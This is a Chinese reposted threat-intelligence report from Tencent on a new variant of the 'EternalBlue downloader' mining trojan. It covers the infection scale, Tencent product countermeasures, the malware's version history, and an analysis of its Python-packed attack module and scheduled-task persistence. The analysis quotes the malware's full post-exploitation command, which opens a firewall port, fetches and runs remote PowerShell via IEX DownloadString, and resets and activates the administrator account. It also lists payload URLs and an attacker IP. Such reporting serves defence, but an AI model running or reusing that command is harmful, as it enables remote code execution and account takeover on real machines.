永恒之蓝下载器最新变种重启EXE文件攻击，新变种已感染1.5万台服务器-安全小百科

感谢腾讯御见威胁情报中心来稿！

原文链接：https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A

一、背景

腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种，此次变种利用Python打包EXE可执行文件进行攻击，该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示，永恒之蓝下载器最新变种出现之后便迅速传播，目前已感染约1.5万台服务器，中毒系统最终用于下载运行门罗币挖矿木马。

永恒之蓝下载器木马在不断演进更新过程中，曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后，该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中，并对Powershell中相关代码进行屏蔽。

被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播，同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿，会给受害企业造成严重生产力损失。

腾讯安全专家建议企业网管参考腾讯安全响应清单，对企业网络资产进行安全检测，以及时消除永恒之蓝下载器木马的破坏活动：

应用

场景

安全产品

解决方案

威

胁

情

报

腾讯T-Sec

威胁情报云查服务

（SaaS）

1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

（Cloud Firewall，CFW）

基于网络流量进行威胁检测与主动拦截，已支持：

1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测；

2）支持下发访问控制规则封禁目标端口，主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。

有关云防火墙的更多信息，可参考：
https://cloud.tencent.com/product/cfw

腾讯T-Sec 主机安全

（Cloud Workload Protection，CWP）

1）云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测；

2）已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。

腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp

腾讯T-Sec 漏洞扫描服务

（Vulnerability Scan Service，VSS）

1）腾讯漏洞扫描服务（VSS）已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。

2）已集成无损检测POC，企业可以对自身资产进行远程检测。

关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

（腾讯御界）

基于网络流量进行威胁检测，已支持：

1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测；

2）对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测；

关于T-Sec高级威胁检测系统的更多信息，可参考：

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统（御点）

1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序；

2）企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。

3）企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序；

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html

更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/

附：永恒之蓝下载器木马历次版本更新情况如下：

时间	主要功能更新
2018年12月14日	利用“驱动人生”系列软件升级通道下载，利用“永恒之蓝”漏洞攻击传播。
2018年12月19日	下载之后的木马新增Powershell后门安装。
2019年1月9日	检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。
2019年1月24日	木马将挖矿组件、升级后门组件分别安装为计划任务，并同时安装Powershell后门。
2019年1月25日	木马在1月24日的基础上再次更新，将攻击组件安装为计划任务，在攻击时新增利用mimikatz搜集登录密码，SMB弱口令爆破攻击，同时安装Powershell计划任务和hta计划任务。
2019年2月10日	将攻击模块打包方式改为Pyinstaller。
2019年2月20日	更新矿机组件，下载释放XMRig矿机，以独立进程启动挖矿。
2019年2月23日	攻击方法再次更新，新增MsSQL爆破攻击。
2019年2月25日	在2月23日基础上继续更新，更新MsSQL爆破攻击时密码字典，添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击。
2019年3月6日	通过已感染机器后门更新Powershell脚本横向传播模块ipc。
2019年3月8日	通过已感染机器后门更新PE文件横向传播模块ii.exe，采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。
2019年3月14日	通过后门更新增肥木马大小、生成随机文件MD5逃避查杀，将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。
2019年3月28日	更新无文件攻击模块，更后新的攻击方式为：永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec，并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。
2019年4月3日	开创无文件挖矿新模式：挖矿脚本由PowerShell下载在内存中执行。
2019年7月19日	无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击，感染启动盘和网络共享盘，新增MsSQL爆破攻击。
2019年10月9日	新增Bluekeep漏洞CVE-2019-0708检测上报功能。
2020年2月12日	使用DGA域名，篡改hosts文件。
2020年4月3日	新增钓鱼邮件传播，邮件附件urgent.doc包含Office漏洞CVE-2017-8570。
2020年4月17日	钓鱼邮件新增附件readme.zip、readme.doc，新增Bypass UAC模块7p.php，创建readme.js文件感染可移动盘、网络共享盘
2020年5月21日	新增SMBGhost漏洞CVE-2020-0796检测上报功能，新增SSH爆破代码（未调用）。
2020年6月10日	新增SMBGhost漏洞CVE-2020-0796利用攻击，新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。
2020年6月24日	重新使用Python打包EXE攻击模块20.dat(C:/Windows/Temp/<random>.exe)，负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击，其他攻击方式仍然通过Powershell实现。

二、样本分析

永恒之蓝下载器木马在Powershell攻击代码中，将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留：

1.“永恒之蓝”漏洞利用MS17-010

2.Lnk漏洞利用CVE-2017-8464

3.Office漏洞利用CVE-2017-8570

4.RDP爆破

5.感染可移动盘、网络磁盘

6.钓鱼邮件（使用新冠病毒疫情相关主题）

7.SMBGhost漏洞利用CVE-2020-0796

8.SSH爆破攻击Linux系统

9.Redis未授权访问漏洞攻击Linux系统

然后在攻击后执行的Payload中添加一行代码，负责下载和执行EXE攻击模块

http[:]//d.ackng.com/ode.bin。

Ode.bin是经过加密的Powershell代码，解密后的内容主要完成以下功能：

生成4到8位字符组成的随机字符串作为文件名<random>.exe；
从http[:]//167.71.87.85/20.dat下载文件保存至C:/Windows/Temp/<random>.exe；
如果符合权限则创建计划任务”/Microsoft/Windows/<random>.exe “每50分钟执行一次20.dat，如果不符合权限则创建C:/Windows/Temp//tt.vbs，通过VBS脚本代码创建计划任务“<random>.exe “，同样每50分钟执行一次20.dat。

通过计划任务执行的20.dat（拷贝至C:/Windows/Temp/<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0）实际上是由Python代码打包的扫描攻击模块，与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:/WINDOWS/Temp/svvhost.exe相似（参考https://www.freebuf.com/news/192015.html）。

该病毒在后来的逐步发展过程中，逐步将攻击代码转移到了Powershell实现，并且利用计划任务来动态获取和启动，不会在磁盘上留下文件，也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块，可能是因为其功能不断扩展，需要将一部分代码进行分割，切割后的攻击模块及功能如下图所示。

If.bin中的Powershell攻击代码与上个版本相同，此处不再分析，分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下，另外还会执行$IPC、SMB、mssql弱口令爆破攻击：

攻击成功后执行shellcode

1、下载和执行Powershell代码gim.jsp；

2、修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户；

3、添加防火墙规则允许65529端口访问并开启监听。

cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes

gim.jsp是经过加密的Powershell代码，首先检测系统是否安装了以下杀软，如有调用卸载程序进行卸载：

Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware

然后安装一个计划任务“blackball”和一个随机名计划任务，定期下载和执行a.jsp（a.jsp继续下载和执行挖矿和攻击模块）。